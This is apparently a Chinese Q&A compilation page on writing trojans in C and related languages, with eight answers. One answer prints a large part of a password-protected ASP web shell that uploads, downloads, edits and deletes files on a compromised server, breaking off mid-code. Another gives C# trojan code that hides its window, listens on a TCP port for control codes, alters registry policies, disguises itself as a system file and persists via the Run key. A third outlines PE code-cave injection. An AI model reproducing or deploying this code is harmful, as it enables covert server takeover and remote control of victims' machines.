c木马源码

1. c语言木马源代码

ls这个好像是感染c文件的病毒,自动加上玩笑代码(当然可以是恶意的)
不是木马

2. 请介绍下C语言写木马的算法......

我只知道window的木马程序的原理，首先你要去研究一下windows PE文件的格式，windows PE文件包括(exe dll文件等)，用文本方式打开任意一个exe或者dll文件，就会发现这些文件都具有类似的组织结构（就是PE格式）
仔细耐心地研究了PE格式后，你会发现这些PE格式的文件有很多间隙空间可用，window木马程序正是利用PE格式文件中的这些间隙，把自己的代码插入这些间隙空间中，同时还要修改宿主程序的入口地址（OEP Original Entry Point）
这样，宿主程序一运行，首先运行生成木马的代码，然后运行宿主程序。

Windows应用程序捆绑核心编程 （PE）
http://book.csdn.net/bookfiles/212/10021210198.shtml

http://www.diybl.com/course/3_program/c++/cppjs/2008219/100330.html

3. c语言编写的木马源代码

这位牛人的博客中有一个
http://huaidan.org/archives/1774.html

4. 怎么用C语言编写木马、病毒等程序

C语言当然可以编写病毒，事实上很多程序都是用C/C++编写出来的。x0dx0a编程语言本身没有“贵贱”之分，只用用好了，都是相当强的；区别在于主要适用范围、编写的难易程序、执行效率的高低、学习的难易程度，等等。x0dx0aC语言只是一种计算机程序的编写格式规范，到至于可以编写出来什么样的程序，还要看你所用的C语言编译器，（比如TC，VC，LCC，GCC等，太多了）。x0dx0a如果有编写windows程序，就不能用TC，它只能编写DOS程序，而应该用VC，LCC，C++Builder等编译工具）x0dx0a编写出来的程序肯定要调用操作系统提供的功能，如编windows程序，就要调用Win32 API,Dos程序则调用的是DOS中断，编程实际上就是对这些操作系统所提供功能的调用。x0dx0a现在的病毒很多都是用常用的编程工具编写的，如VC++,delph,VC，Win32汇编等

5. 木马程序源码

一个asp木马：
＜%@ LANGUAGE = VBScript.Encode codepage ="936" %＞
＜%Server.ScriptTimeOut=5000%＞
＜object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"＞＜/object＞
＜object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"＞＜/object＞
＜object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"＞＜/object＞
＜%
'on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function

Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function

Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP上传程序 Version 2.0"
set objForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes＜1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_5xsoft = Server.CreateObject("adodb.stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read

iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) ＜ iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) ＞ 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub

Private Sub Class_Terminate
if Request.TotalBytes＞0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub

Private function GetFilePath(FullPath)
If FullPath ＜＞ "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function

Private function GetFileName(FullPath)
If FullPath ＜＞ "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class

Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub

Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.to dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="q_ux888556" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %＞
＜html＞
＜head＞
＜meta http-equiv="Content-Type" content="text/html; charset=gb2312"＞
＜title＞＜%=httpt%＞＜/title＞
＜meta name="GENERATOR" content="Microsoft FrontPage 3.0"＞
＜/head＞

＜body＞
＜%if request.form("password")＜＞"" then
response.write "Password Error!"
end if
%＞

＜table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0"＞
＜tr＞
＜td width="100%" height="31" bgcolor="#000080"＞＜p align="center"＞＜font color="#FFFFFF"＞＜%=httpt%＞＜/font＞＜/td＞
＜/tr＞
＜tr＞
＜td width="100%" height="46"＞＜form method="POST" action="＜%=rseb%＞?q=＜%=rseb%＞"＞
＜div align="center"＞＜center＞＜p＞Enter Password：＜input type="password" name="password"
size="20"
style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset"＞
＜input type="submit" value="OK!LOGIN" name="B1"
style="font-size: 9pt; border: thin outset"＞＜/p＞
＜/center＞＜/div＞
＜/form＞
＜/td＞
＜/tr＞
＜/table＞
＜/body＞
＜/html＞
＜%end if%＞

＜%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject("adodb.stream")
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("＜h1＞Error:＜/h1＞" & strFilename & " does not exist＜p＞")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("＜h1＞Error: ＜/h1＞" & err.Description & "＜p＞")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%＞
＜%case "list.asp"%＞
＜%
urlpath=server.urlencode(path)
if Request.Cookies("password")="7758521" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"＜a href='" & rseb & "?q=list.asp&path="&Request("oldpath")&"&attrib="&attrib&"'＞＜font color='#FF8000'＞■＜/font＞↑＜font color='ff2222'＞回上级目录＜/font＞＜/a＞＜br＞＜script language=vbscript＞"
For Each x In theSubFolders
%＞so "＜%=lpath%＞","＜%=x.Name%＞","＜%=request("path")%＞","＜%=attrib%＞"
＜%
Next
%＞＜/script＞＜%
end if
End Sub

Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"＜table border='0' width='100%' cellpadding='0'＞＜script language=vbscript＞"
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if
%＞sf "＜%=showstring%＞","＜%=x.size%＞","＜%=x.type%＞","＜%=x.Attributes%＞","＜%=x.DateLastModified%＞","＜%=lpath%＞","＜%=x.name%＞","＜%=attrib%＞","＜%=x.name%＞"
＜%
Next
end if
Response.write"＜/script＞＜/table＞"
End Sub
%＞
＜html＞

＜head＞
＜meta http-equiv="Content-Type" content="text/html; charset=gb2312"＞
＜title＞＜%=httpt%＞＜/title＞
＜style type="text/css"＞
＜!--
table{ font-family: 宋体; font-size: 9pt }
a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }
a:visited{ color: rgb(128,0,0) }
td { font-size: 9pt}
a { color: #000000; text-decoration: none}
a:hover { text-decoration: underline}
.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}
.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}
.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}
--＞
＜/style＞
＜/head＞
＜script language="javaScript"＞
function crfile(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("＜%=rseb%＞?q=edit.asp&attrib=＜%=request("attrib")%＞&creat=yes&path=＜%=lpath%＞"+ls);}
return false;
}
function crdir(ls)
{if (ls==""){alert("请输入文件名!");}
else {window.open("＜%=rseb%＞?q=edir.asp&attrib=＜%=request("attrib")%＞&op=creat&path=＜%=lpath%＞"+ls);}
return false;
}
＜/script＞
＜script language="vbscript"＞
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "＜tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""＞＜td width='50%'＞＜font color='#FF8000'＞＜font face=Wingdings＞+＜/font＞＜/font＞＜a href='"& urlpath & lpath & xName &"' target='_blank'＞＜strong＞" & showstring & "＜/strong＞＜/a＞＜/td＞＜td width='20%' align='right'＞" & size & "字节＜/td＞＜td width='30%'＞＜a href='#' title='类型：" & type1 & chr(10) & "属性：" & Attributes & chr(10) & "时间：" & DateLastModified &"'＞属性＜/a＞ ＜a href='＜%=rseb%＞?q=edit.asp&path=" & lpath & xName & "&attrib=" & attrib &"' target='_blank' ＞＜font color='#FF8000' ＞＜/font＞编辑＜/a＞ ＜a href="&chr(34)&"javascript: rmdir1('"& lpath & xName &"')"&chr(34)&"＞＜font color='#FF8000' ＞＜/font＞删除＜/a＞ ＜a href='#' onclick=file('" & lpath & Name & "')＞＜font color='#FF8000' ＞＜/font＞复制＜/a＞ ＜a href='＜%=rseb%＞?q=down.asp&path=＜%=cpath%＞\"&xName&"&attrib=" & attrib &"' target='_blank' ＞＜font color='#FF8000' ＞＜/font＞下载＜/a＞＜/td＞＜/tr＞"
end sub
sub so(lpath,xName,path,attrib)
document.write "＜a href='＜%=rseb%＞?q=list.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"'＞└＜font color='#FF8000'＞＜font face=Wingdings＞1＜/font＞＜/font＞ " & xName &"＜/a＞ ＜a href="&chr(34)&"javascript: rmdir('"& lpath & xName &"')"&chr(34)&"＞＜font color='#FF8000' ＞＜/font＞删除＜/a＞＜br＞"
end sub

sub rmdir1(ls)
if confirm("你真的要删除这个文件吗!"&Chr(13)&Chr(10)&"文件为："&ls) then
window.open("＜%=rseb%＞?q=edit.asp&path=" & ls & "&op=del&attrib=＜%=request("attrib")%＞")
end if
end sub

sub rmdir(ls)
if confirm("你真的要删除这个目录吗!"&Chr(13)&Chr(10)&"目录为："&ls) then
window.open("＜%=rseb%＞?q=edir.asp&path="&ls&"&op=del&attrib=＜%=request("attrib")%＞")
end if
end sub

sub file(sfile)
dfile=InputBox("※文件复制※"&Chr(13)&Chr(10)&"源文件："& sfile&Chr(13)&Chr(10)&"输入目标文件的文件名:"&Chr(13)&Chr(10) &"[允许带路径,要根据你的当前路径模式]")
dfile=trim(dfile)
attrib="＜%=request("attrib")%＞"
if dfile＜＞"" then
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib＜＞"true" then
alert "对不起，你在相对路径模式下不能使用绝对路径"&Chr(13)&Chr(10)&"错误路径：["&dfile&"]"
exit sub
end if
else
lp="＜%=lpath%＞"
end if
window.open("＜%=rseb%＞?q=edit.asp&path="+sfile+"&op=&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"您没有输入文件名！"
end If
end sub
＜/script＞
＜body＞
＜table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"
bordercolordark="#FFFFFF" cellspacing="0"＞
＜tr＞
＜td width="755" bgcolor="#000080" colspan="2" height="23"＞＜p align="center"＞＜font size="3"
color="#FFFFFF"＞＜%=httpt%＞＜/font＞＜/td＞
＜/tr＞
＜tr＞
＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※换盘：＜span
style="background-color: rgb(255,255,255);color:rgb(255,0,0)"＞＜%
For Each thing in oFileSys.Drives
Response.write "＜font face=Wingdings＞:＜/font＞＜a href='" & rseb & "?q=list.asp&path="&thing.DriveLetter&":&attrib=true'＞"&thing.DriveLetter&":＜/a＞"
NEXT
%＞ ＜/span＞ 地址：
＜%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %＞＜/td＞
＜/tr＞
＜tr＞
＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※＜%
if Request("attrib")="true" then
response.write "＜a href='" & rseb & "?q=list.asp'＞切到相对路径＜/a＞"
else
response.write "＜a href='" & rseb & "?attrib=true&q=list.asp'＞切到绝对路径＜/a＞"
end if
%＞ ※绝对:＜span
style="background-color: rgb(255,255,255)"＞＜%=cpath%＞＜/span＞＜/td＞
＜/tr＞
＜tr＞
＜td width="751" bgcolor="#C0C0C0" colspan="2"＞※当前＜font color="#FF8000"＞＜font face=Wingdings＞1＜/font＞＜/font＞:＜span style="background-color: rgb(255,255,255)"＞＜%=lpath%＞＜/span＞ ＜/td＞
＜/tr＞＜form name="form1" method="post" action="＜%=rseb%＞?q=upfile.asp" target="_blank" enctype="multipart/form-data"＞
＜tr＞＜td bgcolor="#C0C0C0" colspan="2" style="height: 20px"＞

编辑|
＜input class="tx1" type="text" name="filename" size="20"＞
＜input class="tx1" type="button" value="建文" onclick="crfile(form1.filename.value)"＞
＜input class="tx1" type="button" value="建目" onclick="crdir(form1.filename.value)"＞
＜input type="file" name="file1" class="tx1" style="width:100" value=""＞
＜input type="text" name="filepath" class="tx1" style="width:100" value="＜%=cpath%＞"＞
＜input type="hidden" name="act" value="upload"＞
＜input type="hidden" name="upcount" class="tx" value="1"＞
＜input class="tx1" type="submit" value="上传"＞
＜input class="tx1" type="button" onclick="window.open('＜%=rseb%＞?q=cmd.asp','_blank')" value="命令"＞
＜input class="tx1" type="button" onclick="window.open('＜%=rseb%＞?q=test.asp','_blank')" value="配置"＞
＜input class="tx1" type="button" onclick="window.open('＜%=rseb%＞?q=p.asp','_blank')" value="nfso"＞
＜/td＞
＜/td＞
＜/tr＞＜/form＞
＜tr＞
＜td width="169" valign="top" bgcolor="#C8E3FF"＞＜%Call GetFolder()%＞
＜/td＞
＜td width="582" valign="top" bgcolor="#FFefdf"＞＜%Call GetFile()%＞
＜/td＞
＜/tr＞
＜/table＞
＜%else
response.write "Password Error!"
response.write "＜a href='" & rseb & "?q=" & rseb & "'＞【返 回】＜/a＞"
end if
%＞
＜/body＞
＜/html＞
＜%case "edit.asp"%＞
＜html＞

＜head＞
＜meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"＞
＜title＞编辑源代码＜/title＞
＜style＞
＜!--
table{ font-family: 宋体; font-size: 12pt }
a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }
a:visited{ color: rgb(128,0,0) }
--＞
＜/style＞
＜/head＞

＜body＞
＜% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write "＜script＞alert('删除成功！要刷新才能看到效果');window.close();＜/script＞"
else
if request("op")="" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile. dsfile
%＞
＜script language=vbscript＞
msgbox "源文件：＜%=whichfile%＞" & vbcrlf & "目的文件:＜%=dsfile%＞" & vbcrlf & "复制成功！要刷新才能看到效果!"
window.close()
＜/script＞
＜%
else
if request.form("text")="" then
if Request("creat")＜＞"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%＞

＜form method="POST" action="＜%=rseb%＞?q=edit.asp"＞
＜input type="hidden" name="attrib" value="＜%=Request("attrib")%＞"＞＜table border="0"
width="700" cellpadding="0"＞
＜tr＞
＜td width="100%" bgcolor="#FFDBCA"＞＜div align="center"＞＜center＞＜p＞＜%=httpt%＞＜/td＞
＜/tr＞
＜tr align="center"＞
＜td width="100%" bgcolor="#FFDBCA"＞文件名：＜input type="text" name="path" size="45"
value="＜%=Request("path")%＞ "＞直接更改文件名，相当于“另存为”＜/td＞
＜/tr＞
＜tr align="center"＞
＜td width="100%" bgcolor="#FFDBCA"＞＜textarea rows="25" name="text" cols="90"＞＜%=thisline%＞＜/textarea＞＜/td＞
＜/tr＞
＜tr align="center"＞
＜td width="100%" bgcolor="#FFDBCA"＞＜div align="center"＞＜center＞＜p＞＜input type="submit"
value="提交" name="B1"＞＜input type="reset" value="复原" name="B2"＞＜/td＞
＜/tr＞
＜/table＞
＜/form＞
＜%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write "＜script＞alert('修改成功！要刷新才能看到效果');window.close();＜/script＞"
end if
end if
end if
else
response.write "Password Error!"
response.write "＜a href='" & rseb & "?q=" & rseb & "'＞【返 回】＜/a＞"
end if

%＞
＜/body＞
＜/html＞
＜%case "edir.asp"%＞
＜html＞

＜head＞
＜meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80"＞
＜title＞目录操作＜/title＞
＜style＞
＜!--
table{ font-family: 宋体; font-size: 12pt }
a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }
a:visited{ color: rgb(128,0,0) }
--＞
＜/style＞
＜/head＞

＜body＞
＜% '读文件
if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write "＜script＞alert('删除的目录为:" & whichdir & "删除成功！要刷新才能看到效果');window.close();＜/script＞"

else

if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write "＜script＞alert('建立的目录为:" & whichdir & "建立成功！要刷新才能看到效果');window.close();＜/script＞"
end if
end if
else
response.write "Password Error!"
response.write "＜a href='" & rseb & "?q=" & rseb & "'＞【返 回】＜/a＞"
end if
%＞
＜/body＞
＜/html＞
＜%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "请输入要上传至的目录!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)＜＞"/" then formPath=formPath&"/"
end if

iCount=0
for each formName in upload.objForm
set file=upload.file(formName)
if file.FileSize＞

6. c语言可以编个木马吗

要实现木马服务的程序，主要实现以下几个功能：后台的运行（隐藏技术），控制码的接收与注册表的修改，下面对这三方面做介绍：

1、在VC#中，建立一个后台服务程序是很容易的，先建立一个新的C#的Windows应用程序，项目名称自定（不过为了隐藏可使用与系统相近的名称），将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中显示，并将属性“Windowstate”属性设为Mininized即可，这样窗体就可以隐藏运行了。当然你也可以在InitializeComponent()设置，此函数起初始化的作用，在窗体显示前运行，代码如下：

private void InitializeComponent()
{
//
// Form1
//
//窗体显示的起点和大小
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(368, 357);
//窗体名称
this.Name = "Form1";
//设置属性让它后台运行
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}

2、控制代码的接收，必需在服务程序运行开始就启动，所以侦听线程必需在程序初始化中启动，所以放在窗体的构造函数中，代码注解如下：

public Form1() //窗体的构造函数
{
//
// Windows 窗体设计器支持所必需的
//
InitializeComponent();

//
// TODO: 在 InitializeComponent 调用后添加任何构造函数代码
//加入你的侦听代码
//端口你可以自已设定,我使用了固定的端口
int port =6678;
//System.Net.Sockets.TcpListener是用来在Tcp网络中侦听客户端的
listener = new TcpListener(port);
//启动侦听
listener.Start();
//增加接收控制码的线程,如果要停止线程可以用 Thread.abort()
//reControlCode 是线程启动执行的函数，此函数根据接收的控制
//控制码选取合适的注册表修改函数
Thread thread = new Thread(new ThreadStart(reControlCode));
thread.Start();
}
reControlCode函数如下，完整代码见程序
private void reControlCode()
{
//设置接收套接字,接收listener.AcceptSocket是返回已经接收的客户的请求
socket = listener.AcceptSocket();
//如果连接成功执行
while (socket.Connected)
{
//接收控制码
byte [] by =new byte[6];
int i = socket.Receive(by,by.Length ,0);
string ss = System.Text.Encoding.ASCII.GetString(by);
//根据控制码执行不同的功能

//修改注册表加入编码
switch (ss)
{
case "jiance"://测试连接,返回测试信息
string str ="hjc";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);
socket.Send(bytee,0,bytee.Length,0);
break;
case "zx1000":
//修改注册表函数,自已定义，见下面分析
UnLogOff();
//返回控制消息
retMessage();
break;

case "zx0100":
//修改注册表函数
UnClose();
//返回控制消息
retMessage();
break;
//重复的case功能与前面一样,略掉
default:
break;
}//case
}//while
} //private void reControlCode

3、C#中实现注册表的修改，使用了.NET类库中的System.Microsoft.Win32命令空间，它提供两种类型的类：处理由操作系统引发的事件的类和对系统注册表进行操作的类。下面就可以看到它的用法。这里我做了一个修改注册表的子程序：使计算机不能注销。在这之前先了解注册表，在子键SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
下面设键值NoLogOff 为 1 即可使计算机无法注销。在下面的函数中用C#实现对注册表的修改：

private void UnLogOff()
{
//得到主机的注册表的顶级节点
Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
//设置一个注册表子键的变量
RegistryKey key1;
try
{
//函数RegistryKey.OpenSubkey(string registrykey,bool canwrite)检索指定的子键
//registrykey是用户指定的键值，canwrite 为true则可修改，默认为fasle不可改
key1 =
rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
//设置子键的键名，和值
key1.SetValue ("NoLogOff",1);
//关闭打开的子键
key1.Close();
//警告字符串设定
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改！请将它置为0!";
}
catch{}
//如果不存在自已建立
if(key1 ==null)
{
try
{
//使用RegistryKey.CreateSubKey(string mystring)函数来建立你需要的子键
RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改！请将它置为0!";
}
catch{}
}
}

4、在木马程序中还有一个重要的功能就是自我的复制和转移。木马引入被控制的主机时必需自动将木马隐藏在System,System32的目录下以防被发现。转移的代码分析如下，主要实现的功能是将D盘下的木马程序转移到C:\\winnnt\\system\\msdoss.exe，同时换名称。使用的.NET命名空间System.IO,它的作用是允许对数据流和文件进行同步和异步读写。这里我们使用了System.IO.File类。

private void moveCC1()
{
try
{
//函数File.Move(string sourceFileName,string destFileName)起移动文件的作用
//sourceFileName为要移动的文件名，destFileName为文件的新路径
File.Move("C:\\winnnt\\system\\msdoss.exe","d:\\winnt\\system32\\expleror.exe");
}
catch {}
//将新移的木马程序设为自启动.分析和前面一样
try
{
key1 = rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
if(key1 ==null)
{
try
{
RegistryKey key2=rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
}
} //moveCC1()
按照步骤来就可以得到一个C#木马了..
都给出答案了.可以给分卜？

7. 易语言编出来软件有木马，如何在源码中解决

您好，易语言编写出来的程序都会被杀毒软件误报，在源码中是无法解决这个问题的，易语言有的时候缓卖裤编写一个空文件出来扰简都会被报毒，加壳什么的都无法根除这个问题。
如果您做的软件被杀毒误报，您要解除误报的话，建议您进入您杀毒软件的误报申诉。
以下我就用腾讯电脑管家来做一个演示，先进入http://guanjia.qq.com/trojan_false.html
然后提交您被误报的文件，申诉就可以了！
希望我的回答能配绝帮助到您！如有疑问请进入腾讯电脑管家企业平台：http://..com/c/guanjia/
腾讯电脑管家企业平台：http://..com/c/guanjia/

8. 如何用C语言制作木马

这个一两句也说不清楚 你首先要有信心去学习c语言，c语言不像vb，要到后期才能看到它的威力，所以要坚持的学下去 希望你能坚持住，教程网上随便一搜索就有了，还有可以去买书 都可以 总之要有耐心 坚持！！